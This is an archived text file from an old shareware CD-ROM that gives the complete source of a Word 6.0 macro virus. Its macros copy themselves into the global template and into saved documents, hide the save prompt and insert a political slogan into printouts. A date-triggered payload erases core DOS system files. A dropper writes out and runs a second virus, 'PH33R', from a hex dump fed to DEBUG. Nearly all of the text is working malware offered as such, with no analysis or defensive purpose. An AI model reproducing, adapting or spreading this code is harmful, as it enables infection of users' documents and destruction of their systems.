HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / MVUPDAT3.ZIP / NUCLEAR.ZIP / WINMACRO.TXT < prev

Wrap

Text File | 1980-01-01 | 14KB | 343 lines

NEW WORD 6.0 MACRO VIRUS ------------------------ New Features: * Drops another virus ("PH33R"). * Stealth's existence from the user. * Bypasses "Save NORMAL.DOT?" prompt. * Inserts text into documents when printing (at times). * Uses execute-only macro's. * Contains a payload to destroy IO.SYS/MSDOS.SYS/COMMAND.COM on April the 5th. ======================================================== PURPOSE: To enable NORMAL.DOT to be saved without prompting. MACRO NAME: FileExit MACRO CODE: Sub MAIN ToolsOptionsSave .GlobalDotPrompt = 0 FileExit End Sub ======================================================== PURPOSE: To make the virus active before any documents have been loaded. MACRO NAME: AutoExec MACRO CODE: Sub MAIN If CheckInstalled = 0 Then MacroCopy WindowName$()+":AutoExec", "Global:AutoExec", 1 MacroCopy WindowName$()+":ToolsMacro", "Global:ToolsMacro", 1 MacroCopy WindowName$()+":AutoOpen", "Global:AutoOpen", 1 MacroCopy WindowName$()+":FileSaveAs", "Global:FileSaveAs", 1 MacroCopy WindowName$()+":FilePrint", "Global:FilePrint", 1 MacroCopy WindowName$()+":FilePrintDefault","Global:FilePrintDefault",1 MacroCopy WindowName$()+":InsertPayload", "Global:InsertPayload",1 MacroCopy WindowName$()+":PayLoad", "Global:Payload",1 End If Call Payload End Sub Function CheckInstalled 'Check if AutoExec macro already exists. CheckInstalled = 0 If CountMacros(0) > 0 Then For i = 1 To CountMacros(0) If MacroName$(i, 0) = "AutoExec" Then CheckInstalled = 1 End If Next i End If End Function ======================================================== PURPOSE: To infect the Global Macro Area as soon as a document is opened. MACRO NAME: AutoOpen MACRO CODE: Sub MAIN If CheckInstalled = 0 Then MacroCopy WindowName$()+":AutoExec", "Global:AutoExec", 1 MacroCopy WindowName$()+":ToolsMacro", "Global:ToolsMacro", 1 MacroCopy WindowName$()+":AutoOpen", "Global:AutoOpen", 1 MacroCopy WindowName$()+":FileSaveAs", "Global:FileSaveAs", 1 MacroCopy WindowName$()+":FilePrint", "Global:FilePrint", 1 MacroCopy WindowName$()+":FilePrintDefault","Global:FilePrintDefault",1 MacroCopy WindowName$()+":InsertPayload", "Global:InsertPayload",1 MacroCopy WindowName$()+":PayLoad", "Global:Payload",1 End If Call Payload End Sub Function CheckInstalled 'Check if AutoExec macro already exists. CheckInstalled = 0 If CountMacros(0) > 0 Then For i = 1 To CountMacros(0) If MacroName$(i, 0) = "AutoExec" Then CheckInstalled = 1 End If Next i End If End Function ======================================================== PURPOSE: To infect a file when it is being saved. MACRO NAME: FileSaveAs MACRO CODE: Sub MAIN Dim dlg As FileSaveAs 'declare dialog as type FileSaveAs GetCurValues dlg Dialog dlg 'execute the dialog. 'Is the document of Type=(WordDocument or Template) ? If (dlg.Format = 0) Or (dlg.Format = 1) Then 'Copy Macro's from Global data area into document. MacroCopy "Global:AutoExec", WindowName$() + ":AutoExec", 1 MacroCopy "Global:AutoOpen", WindowName$() + ":AutoOpen", 1 MacroCopy "Global:FileSaveAs", WindowName$() + ":FileSaveAs", 1 MacroCopy "Global:ToolsMacro", WindowName$() + ":ToolsMacro", 1 MacroCopy "Global:FilePrint", WindowName$() + ":FilePrint", 1 MacroCopy "Global:FilePrintDefault", WindowName$() + ":FilePrintDefault", 1 MacroCopy "Global:InsertPayload", WindowName$()+":InsertPayload",1 MacroCopy "Global:Payload", WindowName$()+":Payload",1 'Set to save document as a template. dlg.Format = 1 End If FileSaveAs dlg 'save the document infected. End Sub ======================================================== PURPOSE: To call InsertPayload when someone chooses Print from the File menu. MACRO NAME: FilePrint MACRO CODE: Sub MAIN Call InsertPayload 'possibly insert text. Dim dlg As FilePrint 'declare dialog of type FilePrint GetCurValues dlg Dialog dlg 'excute print dialog window. FilePrint dlg 'perform actions from dialog. End Sub ======================================================== PURPOSE: To call InsertPayload when someone clicks the "Print" button on the toolbar. MACRO NAME: FilePrintDefault MACRO CODE: Sub MAIN Call InsertPayload 'possibly insert text. FilePrintDefault 'print document using default settings. End Sub ======================================================== PURPOSE: Insert some text into documents if Second > 55. MACRO NAME: InsertPayload MACRO CODE: Sub MAIN If Second(Now()) > 55 Then 'seconds > 55 ? EndOfDocument 'go to the end of document. Insert Chr($ 11) Insert "And finally I would like to say:" Insert Chr($ 11) Insert "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!" StartOfDocument 'go to the start of document. End If End Sub ======================================================== PURPOSE: What the hell do you think? MACRO NAME: PayLoad MACRO CODE: Sub MAIN: If Day(Now())=5 And Month(Now())=4 Then SetAttr "C:\IO.SYS",0 Open "C:\IO.SYS" For Output As #1 Close #1 SetAttr "C:\MSDOS.SYS",0 Open "C:\MSDOS.SYS",0 Close #1 SetAttr "C:\COMMAND.COM",0 Open "C:\COMMAND.COM" For Output As #1 Close #1 Kill "C:\COMMAND.COM" End If End Sub ======================================================== Sub MAIN 'Is is 5PM ? - approx time before work is finished. If Hour(Now()) <> 5 + 12 Then Goto NoDropper On Error Goto NoDropper 'setup an error handler Open "C:\DOS\DEBUG.EXE" For Input As #1 'does DEBUG exist? Close #1 'Yes, close it. Open "C:\DOS\PH33R.SCR" For Output As #1 'dump script. Print #1, "N PH33R.COM" Print #1, "E 0100 E8 47 00 06 1F BF 00 01 57 B8 CD 20 AB B8 00 00" Print #1, "E 0110 AB 33 C0 33 DB 33 C9 33 D2 33 F6 33 FF C3 E8 29" Print #1, "E 0120 00 06 1F 8C D8 05 10 00 05 00 00 8E D0 BC 00 00" Print #1, "E 0130 8C D8 05 10 00 05 00 00 50 B8 00 00 50 33 C0 33" Print #1, "E 0140 DB 33 C9 33 D2 33 F6 33 FF CB FC B8 FF 51 CD 21" Print #1, "E 0150 3D 51 FF 74 16 B8 02 FA BA 45 59 32 DB CD 16 8C" Print #1, "E 0160 D8 48 8E D8 33 FF 80 3D 59 77 01 C3 81 6D 03 A7" Print #1, "E 0170 00 81 6D 12 A7 00 8B 45 12 06 8E C0 0E 1F B9 34" Print #1, "E 0180 05 E8 00 00 5E 81 EE 84 00 F3 A4 8E D9 BE 84 00" Print #1, "E 0190 BF 2A 01 56 A5 A5 5E BF 5B 04 A5 A5 C7 44 FC 04" Print #1, "E 01A0 01 8C 44 FE 06 B4 52 CD 21 8C C0 07 8E D8 BE 9E" Print #1, "E 01B0 10 AD 3D 90 90 75 11 AC 3C E8 75 0C 26 C7 06 5B" Print #1, "E 01C0 04 A0 10 26 8C 1E 5D 04 07 C3 3D 50 68 33 33 72" Print #1, "E 01D0 3D 3D FE 51 75 03 86 E0 CF 3D 00 4B 74 0F 80 FC" Print #1, "E 01E0 3D 74 0A 80 FC 56 74 05 80 FC 43 75 3C 9C 60 1E" Print #1, "E 01F0 06 B8 0A 00 8C CB CD 31 8E C0 E8 43 00 07 1F 61" Print #1, "E 0200 9D E9 25 00 3D FF 51 75 0C 86 E0 CF 51 61 72 6B" Print #1, "E 0210 2F 56 4C 41 44 3D 00 4B 74 14 80 FC 6C 74 0F 80" Print #1, "E 0220 FC 56 74 0A 80 FC 43 74 05 EA 00 00 00 00 06 52" Print #1, "E 0230 80 FC 6C 75 02 89 F2 0E 07 E8 04 00 5A 07 EB E9" Print #1, "E 0240 9C 50 53 51 52 56 57 1E 06 FC 89 D6 AC 3C 00 75" Print #1, "E 0250 FB 83 EE 04 AD 0D 20 20 3D 65 78 74 0A 3D 64 6C" Print #1, "E 0260 74 05 3D 63 6F 75 24 81 7C FB 38 36 74 1D 8B 44" Print #1, "E 0270 FB 0D 20 20 3D 61 76 74 12 3D 64 76 74 0D 3D 61" Print #1, "E 0280 6E 74 08 3D 6F 74 74 03 E8 0A 00 07 1F 5F 5E 5A" Print #1, "E 0290 59 5B 58 9D C3 FC B8 02 3D E8 B8 02 73 01 C3 93" Print #1, "E 02A0 06 1F B4 3F B9 00 02 BA 34 05 E8 A7 02 BE 34 05" Print #1, "E 02B0 8B 04 0D 20 20 3D 6D 7A 74 03 E9 A2 00 81 7C 12" Print #1, "E 02C0 AF AF 75 03 E9 E9 00 83 7C 18 40 72 03 E9 E6 00" Print #1, "E 02D0 83 7C 0C FF 75 EE E8 36 03 0B D2 75 05 3D E8 03" Print #1, "E 02E0 72 E2 B9 00 02 F7 F1 40 39 44 04 77 D7 8B 44 0E" Print #1, "E 02F0 A3 29 00 8B 44 10 A3 2E 00 8B 44 14 A3 3A 00 8B" Print #1, "E 0300 44 16 A3 36 00 E8 07 03 B9 10 00 F7 F1 2B 44 08" Print #1, "E 0310 83 C2 1E 89 54 14 89 44 16 48 89 44 0E 81 C2 DC" Print #1, "E 0320 05 83 E2 FE 89 54 10 E8 B9 02 B9 34 05 B4 40 33" Print #1, "E 0330 D2 E8 20 02 E8 D8 02 B9 00 02 F7 F1 0B D2 74 01" Print #1, "E 0340 40 89 44 04 89 54 02 E8 C1 02 C7 44 12 AF AF B4" Print #1, "E 0350 40 89 F2 B9 1C 00 E8 FB 01 E8 9C 02 E9 51 00 80" Print #1, "E 0360 7C 03 AF 74 4B BF 0A 00 A5 BF 0E 00 A5 B8 02 42" Print #1, "E 0370 33 C9 99 E8 DE 01 0B D2 75 36 3D 60 EA 77 31 3D" Print #1, "E 0380 00 04 72 2C 2D 03 00 A3 1B 05 E8 56 02 B4 40 B9" Print #1, "E 0390 34 05 33 D2 E8 BD 01 72 17 B8 00 42 33 C9 99 E8" Print #1, "E 03A0 B2 01 B4 40 B9 04 00 BA 1A 05 E8 A7 01 E8 48 02" Print #1, "E 03B0 B4 3E E8 9F 01 C3 FF 74 3C 8F 06 1E 05 83 6C 3C" Print #1, "E 03C0 08 83 7C 3E 00 75 E9 C7 44 12 AF AF B8 00 42 33" Print #1, "E 03D0 C9 99 E8 7F 01 E8 0B 02 B4 40 B9 00 02 BA 34 05" Print #1, "E 03E0 E8 71 01 72 CB B8 00 42 8B 16 1E 05 33 C9 E8 63" Print #1, "E 03F0 01 B4 3F B9 00 02 BA 34 05 E8 58 01 8B 44 22 39" Print #1, "E 0400 44 04 72 04 83 44 04 08 39 44 24 72 04 83 44 24" Print #1, "E 0410 08 39 44 26 72 04 83 44 26 08 39 44 28 72 04 83" Print #1, "E 0420 44 28 08 39 44 2A 72 04 83 44 2A 08 8B 44 1C FF" Print #1, "E 0430 44 1C 33 D2 B9 08 00 F7 E1 03 44 22 83 D2 00 B9" Print #1, "E 0440 00 02 F7 F1 A3 22 05 89 16 24 05 FF 74 14 8F 06" Print #1, "E 0450 32 05 FF 74 16 8F 06 30 05 FF 74 32 8F 06 20 05" Print #1, "E 0460 C7 44 14 5F 04 8B 44 1C 89 44 16 FF 36 1E 05 8F" Print #1, "E 0470 06 26 05 A1 22 05 0B C0 74 3C FF 0E 22 05 B8 00" Print #1, "E 0480 42 33 C9 8B 16 26 05 83 EA 08 E8 C7 00 B4 40 B9" Print #1, "E 0490 00 02 89 F2 E8 BD 00 81 06 26 05 00 02 B8 00 42" Print #1, "E 04A0 33 C9 8B 16 26 05 E8 AB 00 B4 3F BA 34 05 B9 00" Print #1, "E 04B0 02 E8 A0 00 EB BD B8 02 42 33 C9 99 E8 95 00 8A" Print #1, "E 04C0 0E 20 05 53 BB 01 00 D3 E3 8B CB 5B F7 F1 C7 06" Print #1, "E 04D0 28 05 00 00 0B D2 74 07 29 D1 89 0E 28 05 40 89" Print #1, "E 04E0 F7 03 3E 24 05 89 05 C7 45 02 34 05 C7 45 04 80" Print #1, "E 04F0 01 C7 45 06 34 07 B8 00 42 33 C9 8B 16 26 05 83" Print #1, "E 0500 EA 08 E8 4F 00 B4 40 8B 0E 24 05 83 C1 08 BA 34" Print #1, "E 0510 05 E8 40 00 FF 36 DF 04 FF 36 E1 04 C7 06 DF 04" Print #1, "E 0520 00 00 C7 06 E1 04 FF FF B8 02 42 33 C9 8B 16 28" Print #1, "E 0530 05 E8 20 00 B4 40 B9 34 05 33 D2 E8 16 00 8F 06" Print #1, "E 0540 E1 04 8F 06 DF 04 B4 40 B9 0A 00 BA 2A 05 E8 03" Print #1, "E 0550 00 E9 59 FE 9C 2E FF 1E 5B 04 C3 00 00 00 00 60" Print #1, "E 0560 1E 06 B8 FE 51 CD 21 3D 51 FF 74 6F B8 0A 00 8C" Print #1, "E 0570 CB CD 31 8E D8 B8 04 02 B3 21 CD 31 89 16 2A 01" Print #1, "E 0580 89 0E 2C 01 89 16 5B 04 89 0E 5D 04 B8 01 05 33" Print #1, "E 0590 DB B9 34 07 CD 31 53 51 33 C0 B9 01 00 CD 31 8B" Print #1, "E 05A0 D8 B8 07 00 5A 59 CD 31 B8 08 00 33 C9 BA 34 07" Print #1, "E 05B0 CD 31 8E C3 B9 34 07 33 F6 33 FF FC F3 A4 8C C3" Print #1, "E 05C0 B8 09 00 B9 FF 00 CD 31 8C C1 BA D1 00 B8 05 02" Print #1, "E 05D0 B3 21 CD 31 B8 04 00 06 5B CD 31 07 1F 61 EA 00" Print #1, "E 05E0 00 FF FF 50 51 52 B8 00 57 E8 68 FF 89 0E FF 04" Print #1, "E 05F0 89 16 FC 04 5A 59 58 C3 50 51 52 BA 00 00 B9 00" Print #1, "E 0600 00 B8 01 57 E8 4D FF 5A 59 58 C3 B0 00 EB 02 B0" Print #1, "E 0610 02 B4 42 33 C9 99 E8 3B FF C3 E9 00 00 AF 00 00" Print #1, "E 0620 00 00 00 00 00 00 00 00 00 00 01 00 03 04 DF 04" Print #1, "E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E 0830 00 00 00 00" Print #1, "RCX" 'Convert this to "G" to run the code Print #1, "0734" Print #1, "G" Print #1, "Q" Print #1, "" Close #1 Open "C:\DOS\EXEC_PH.BAT" For Output As #1 Print #1, "@echo off" Print #1, "debug < ph33r.scr > nul" Close #1 ChDir "C:\DOS" Shell "EXEC_PH.BAT", 0 'Delete temporary files. Kill "C:\DOS\EXEC_PH.BAT" Kill "C:\DOS\PH33R.SCR" NoDropper: End Sub